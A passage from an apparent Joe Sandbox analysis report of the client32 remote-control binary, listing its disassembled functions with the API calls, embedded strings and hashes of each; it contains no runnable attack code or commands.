                                                                              • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                              • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                              Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                              • API String ID: 2111968516-2092292787
                                                                              • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                              • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                              • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                              • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                              Function 11016500 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154windowtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 1101653C
                                                                              • IsWindowVisible.USER32(?), ref: 11016549
                                                                              • GetWindow.USER32(?,00000004), ref: 11016556
                                                                              • IsWindowVisible.USER32(00000000), ref: 11016561
                                                                              • GetClassNameA.USER32(?,?,00000020), ref: 11016576
                                                                              • SendMessageTimeoutA.USER32(?,0000000D,000000C8,?,00000002,00000064,?), ref: 110165DF
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11016604
                                                                              • DeleteObject.GDI32(00000000), ref: 1101665F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Visible$ClassDeleteMessageNameObjectProcessRectSendThreadTimeout
                                                                              • String ID: NSMWControl32$NSSWControl32$Progman
                                                                              • API String ID: 3572104470-975155618
                                                                              • Opcode ID: 9bedd5b8189153278156204b9e6d124ffaee7c4ea08e56ad7d15a7ae3b8edffa
                                                                              • Instruction ID: e961a916bbbcfe8b57c7ffd2e482cea40bc41dda2ab4819b6da64e7ff7338971
                                                                              • Opcode Fuzzy Hash: 9bedd5b8189153278156204b9e6d124ffaee7c4ea08e56ad7d15a7ae3b8edffa
                                                                              • Instruction Fuzzy Hash: AE514175D102299FDB54DF64CC84BEDB7B4BF49304F0041A9E519E7284EB74AA84CF90
                                                                              Function 110762B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(111EE708,AB86ACF8,1110FB6D,00000000,00000000,00000000,E8111B71,111834F3,000000FF,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000), ref: 110762FE
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 11076367
                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 1107636D
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000), ref: 11076377
                                                                              • InitializeCriticalSection.KERNEL32(000004D0,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000), ref: 110763CC
                                                                              • InitializeCriticalSection.KERNEL32(000004F8,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,AB86ACF8,00000000,00000001,00000000,00000000), ref: 110763D5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection$CreateEvent__wcstoi64
                                                                              • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                              • API String ID: 4263422321-2298398812
                                                                              • Opcode ID: 3bfa92a817ece274302d250373404b209347b29eec5472e03355f07c417707ac
                                                                              • Instruction ID: 06ccc5540fe39e817025fd6f1a9fd6d6e0fa44080d25a9a2500616ed5f0e287a
                                                                              • Opcode Fuzzy Hash: 3bfa92a817ece274302d250373404b209347b29eec5472e03355f07c417707ac
                                                                              • Instruction Fuzzy Hash: F651DF75A002859FDB11CF65CC84B9ABBE8FF84304F0485BAED599F245DB71A904CBA0
                                                                              Function 1103E210 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • SETOPTICALDRIVEACCESS, xrefs: 1103E2A4
                                                                              • BLOCKPRINTING, xrefs: 1103E2CD
                                                                              • SETUSBMASSSTORAGEACCESS, xrefs: 1103E273
                                                                              • IsA(), xrefs: 1103E314
                                                                              • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103E296
                                                                              • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103E2F2
                                                                              • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103E2EB
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103E30F
                                                                              • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103E2BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memmove
                                                                              • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 1183979061-1830555902
                                                                              • Opcode ID: 9b34990abfa7304c75fe016d07a1042945b08913bde49073393358d21a8343bb
                                                                              • Instruction ID: 2acc51cda120abcbc41a40362124fa069fa22fd40148d7782b96d72c19966105
                                                                              • Opcode Fuzzy Hash: 9b34990abfa7304c75fe016d07a1042945b08913bde49073393358d21a8343bb
                                                                              • Instruction Fuzzy Hash: 8041B67590022A9FCB01CFA5CC90FEEB7B8EF85349F144669E815A7640EA35F904CBA1
                                                                              Function 11104110 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 137libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8), ref: 11104203
                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 11104247
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 11104284
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetLastError.KERNEL32(00000078), ref: 1110425B
                                                                              Strings
                                                                              • Prevent Power Save (new count=%d,%d), same state=x%x, xrefs: 111042A1
                                                                              • Kernel32.dll, xrefs: 111041F8
                                                                              • *DisablePreventPowerSave, xrefs: 11104146
                                                                              • SetThreadExecutionState, xrefs: 1110423E
                                                                              • *DisableHighPerfPower, xrefs: 1110417A
                                                                              • Client, xrefs: 1110414B, 1110417F
                                                                              • Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x, xrefs: 11104272
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressErrorFreeLastLoadProc__wcstoi64
                                                                              • String ID: *DisableHighPerfPower$*DisablePreventPowerSave$Client$Kernel32.dll$Prevent Power Save (new count=%d,%d), same state=x%x$Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x$SetThreadExecutionState
                                                                              • API String ID: 338032539-196928431
                                                                              • Opcode ID: 9c57c70fdc21affc2296716391b8b67586f8e8409b6c3f0d4ea8d6a206138ae3
                                                                              • Instruction ID: 2e060bf9626fb0c35ad8c6db44363252f10ecc5b1c43e62de7a8a10b1031c62f
                                                                              • Opcode Fuzzy Hash: 9c57c70fdc21affc2296716391b8b67586f8e8409b6c3f0d4ea8d6a206138ae3
                                                                              • Instruction Fuzzy Hash: D641A4B9E41269AFEB00DF96DAD0AADFBF8FB45358F11453EE819A3604D7301844CB51
                                                                              Function 11146570 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 104processsynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • wsprintfA.USER32 ref: 111465AC
                                                                              • PlaySoundA.WINMM(00000000,?,11042985), ref: 11146698
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • Part of subcall function 11143E00: FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              • wsprintfA.USER32 ref: 11146603
                                                                              • _memset.LIBCMT ref: 11146610
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 11146648
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11146660
                                                                              • CloseHandle.KERNEL32(?), ref: 11146673
                                                                              • CloseHandle.KERNEL32(?), ref: 1114667C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFile$FolderHandlePath_memsetwsprintf$ChangeFindModuleNameNotificationObjectOpenPlayProcessSingleSoundVersionWait_strncpy
                                                                              • String ID: %s %s$%sPlaySound.exe$D
                                                                              • API String ID: 409290027-2983100991
                                                                              • Opcode ID: 7102f52d56ead8846a781198aabe43335b826310a085ff073572e0cd4b1e8f60
                                                                              • Instruction ID: f12361923010530fa1f4d3c2fecabc411f8d2defed1a04cf58563ea8446b9f82
                                                                              • Opcode Fuzzy Hash: 7102f52d56ead8846a781198aabe43335b826310a085ff073572e0cd4b1e8f60
                                                                              • Instruction Fuzzy Hash: 1531B875A4022CA7EB24DB60DD41FEAB37CEB48708F100599FA18A75C0DBB1AB40CB94
                                                                              Function 111242E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112433F
                                                                              • InterlockedExchange.KERNEL32(111F19B4,00000001), ref: 11124365
                                                                              • CreateWindowExA.USER32(00000000,button,11195264,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 111243AB
                                                                              • SetWindowLongA.USER32(00000000,000000FC,11124260), ref: 111243CB
                                                                              • SetFocus.USER32(00000000), ref: 111243E2
                                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 111243FC
                                                                              • DestroyWindow.USER32(00000000), ref: 11124412
                                                                              • InterlockedExchange.KERNEL32(111F19B4,00000000), ref: 11124429
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                              • String ID: *NoHideFEP$View$button
                                                                              • API String ID: 1610953178-1502386645
                                                                              • Opcode ID: 3df1cd25a3e99283e66dc0eb30b6fc3792aa7aceeb4f9b7b3075ab98f919e26e
                                                                              • Instruction ID: e7f43078c421523e46d189802bbe7ea8140fa8570dcc46dc3c934ff96bec0ddb
                                                                              • Opcode Fuzzy Hash: 3df1cd25a3e99283e66dc0eb30b6fc3792aa7aceeb4f9b7b3075ab98f919e26e
                                                                              • Instruction Fuzzy Hash: 4831C134686266EFE724CF61DEC4B66FBB8BB0530DF940228F92593984EB70A504CB50
                                                                              Function 110F0180 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalLock.KERNEL32(00000000,00000000,00000000,?,?,110F0F5F,00000000,00000000,00000000), ref: 110F0195
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: GlobalLock
                                                                              • String ID: ..\CTL32\pcibmp.cpp$lpDIBHdr
                                                                              • API String ID: 2848605275-3862004634
                                                                              • Opcode ID: 4a487efc62b0167be38a2ef6a589ff5fd5c2a3bcb33af42fea8e612d83ec71b4
                                                                              • Instruction ID: 48b537532a5f9d411629d31a319caae8f618a47305d54306625b328f3ccba6c9
                                                                              • Opcode Fuzzy Hash: 4a487efc62b0167be38a2ef6a589ff5fd5c2a3bcb33af42fea8e612d83ec71b4
                                                                              • Instruction Fuzzy Hash: 9F210876B402197BD711CEA5AC89FDBB7ADEB8926AF000175FD28C7244EA21D90087E5
                                                                              Function 11138260 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11138283
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                              • _memset.LIBCMT ref: 111382F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc$Version_memset
                                                                              • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                              • API String ID: 1659045089-3162170060
                                                                              • Opcode ID: b43d23eca00fc98279872c74fba5cd571594f629bf43370f3fb923d7744f4274
                                                                              • Instruction ID: 6bea6a721b48e0bd7045a1c1c27de9b3bedd913fe245b2b434f6356e9170b374
